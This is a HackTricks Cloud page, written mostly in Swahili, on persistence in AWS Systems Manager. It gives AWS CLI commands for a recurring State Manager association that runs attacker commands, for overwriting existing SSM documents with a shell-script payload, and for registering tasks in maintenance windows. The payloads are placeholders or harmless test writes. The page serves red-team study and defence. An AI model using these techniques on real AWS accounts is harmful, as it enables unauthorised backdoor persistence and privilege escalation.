AWS - SSM Perssitence

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Angalia the subscription plans!

Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.

Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.

SSM

Kwa maelezo zaidi angalia:

AWS - EC2, EBS, ELB, SSM, VPC & VPN Enum

Using ssm:CreateAssociation for persistence

Mshambulizi mwenye ruhusa ssm:CreateAssociation anaweza kuunda State Manager Association ili kutekeleza commands kiotomatiki kwenye EC2 instances zinazosimamiwa na SSM. Associations hizi zinaweza kusanidiwa ziendeshwe kwa interval ya kudumu, hivyo zinafaa kwa persistence ya aina ya backdoor bila interactive sessions.

aws ssm create-association \
--name SSM-Document-Name \
--targets Key=InstanceIds,Values=target-instance-id \
--parameters commands=["malicious-command"] \
--schedule-expression "rate(30 minutes)" \
--association-name association-name

Note

Hii mbinu ya persistence inafanya kazi mradi EC2 instance inasimamiwa na Systems Manager, SSM agent inaendelea ku-run, na mshambuliaji ana ruhusa ya ku-create associations. Haihitaji interactive sessions au explicit ssm:SendCommand permissions. Important: Parameter ya --schedule-expression (kwa mfano, rate(30 minutes)) lazima iheshimu minimum interval ya AWS ya dakika 30. Kwa immediate au one-time execution, ondoa --schedule-expression kabisa — association itatekelezwa mara moja baada ya creation.

`ssm:UpdateDocument`, `ssm:UpdateDocumentDefaultVersion`, (`ssm:ListDocuments` | `ssm:GetDocument`)

Mshambuliaji akiwa na permissions ssm:UpdateDocument na ssm:UpdateDocumentDefaultVersion anaweza kuongeza privileges kwa kurekebisha documents zilizopo. Hii pia inaruhusu persistence ndani ya document hiyo. Kiutendaji, mshambuliaji pia angehitaji ssm:ListDocuments ili kupata majina ya custom documents, na ikiwa mshambuliaji anataka kuficha payload yake ndani ya document iliyopo, ssm:GetDocument pia itahitajika.

aws ssm list-documents
aws ssm get-document --name "target-document" --document-format YAML
# You will need to specify the version you're updating
aws ssm update-document \
--name "target-document" \
--document-format YAML \
--content "file://doc.yaml" \
--document-version 1
aws ssm update-document-default-version --name "target-document" --document-version 2

Hapa chini ni mfano wa document ambao unaweza kutumika ku-overwrite document iliyopo. Utaweza kuhakikisha kuwa aina ya document yako inalingana na aina ya target documents ili kuepuka issues na innvocation. Document iliyo hapa chini kwa mfano itakuwa kwa ssm:SendCommand na ssm:CreateAssociation examples.

schemaVersion: '2.2'
description: Execute commands on a Linux instance.
parameters:
commands:
type: StringList
description: "The commands to run."
displayType: textarea
mainSteps:
- action: aws:runShellScript
name: runCommands
inputs:
runCommand:
- "id > /tmp/pwn_test.txt"

`ssm:RegisterTaskWithMaintenanceWindow`, `ssm:RegisterTargetWithMaintenanceWindow`, (`ssm:DescribeMaintenanceWindows` | `ec2:DescribeInstances`)

Mshambuliaji mwenye ruhusa za ssm:RegisterTaskWithMaintenanceWindow na ssm:RegisterTargetWithMaintenanceWindow anaweza kuongeza haki kwa kusajili kwanza target mpya kwenye maintenance window iliyopo kisha kusasisha kwa kusajili task mpya. Hii hufanikisha execution kwenye targets zilizopo, lakini inaweza kumruhusu mshambuliaji kuathiri compute zenye roles tofauti kwa kusajili targets mpya. Hii pia huruhusu persistence kwa sababu tasks za maintenance windows hufanyika kwa interval iliyofafanuliwa awali wakati wa uundaji wa window. Kwa vitendo, mshambuliaji pia angehitaji ssm:DescribeMaintenanceWindows ili kupata IDs za maintenance window.

aws ec2 describe-instances
aws ssm describe-maintenance-window
aws ssm register-target-with-maintenance-window \
--window-id "<mw-id>" \
--resource-type "INSTANCE" \
--targets "Key=InstanceIds,Values=<instance_id>"
aws ssm register-task-with-maintenance-window \
--window-id "<mw-id>" \
--task-arn "AWS-RunShellScript" \
--task-type "RUN_COMMAND" \
--targets "Key=WindowTargetIds,Values=<target_id>" \
--task-invocation-parameters '{ "RunCommand": { "Parameters": { "commands": ["echo test > /tmp/regtaskpwn.txt"] } } }' \
--max-concurrency 50 \
--max-errors 100

Tip

Jifunze na ufanye mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na ufanye mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na ufanye mazoezi ya Az Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Saidia HackTricks

Angalia the subscription plans!

Jiunge na 💬 Discord group au the telegram group au utufuate kwenye Twitter 🐦 @hacktricks_live.

Shiriki hacking tricks kwa kutuma PRs kwa HackTricks and HackTricks Cloud github repos.

HackTricks Cloud

AWS - SSM Perssitence

SSM

Using ssm:CreateAssociation for persistence

ssm:UpdateDocument, ssm:UpdateDocumentDefaultVersion, (ssm:ListDocuments | ssm:GetDocument)

ssm:RegisterTaskWithMaintenanceWindow, ssm:RegisterTargetWithMaintenanceWindow, (ssm:DescribeMaintenanceWindows | ec2:DescribeInstances)

`ssm:UpdateDocument`, `ssm:UpdateDocumentDefaultVersion`, (`ssm:ListDocuments` | `ssm:GetDocument`)

`ssm:RegisterTaskWithMaintenanceWindow`, `ssm:RegisterTargetWithMaintenanceWindow`, (`ssm:DescribeMaintenanceWindows` | `ec2:DescribeInstances`)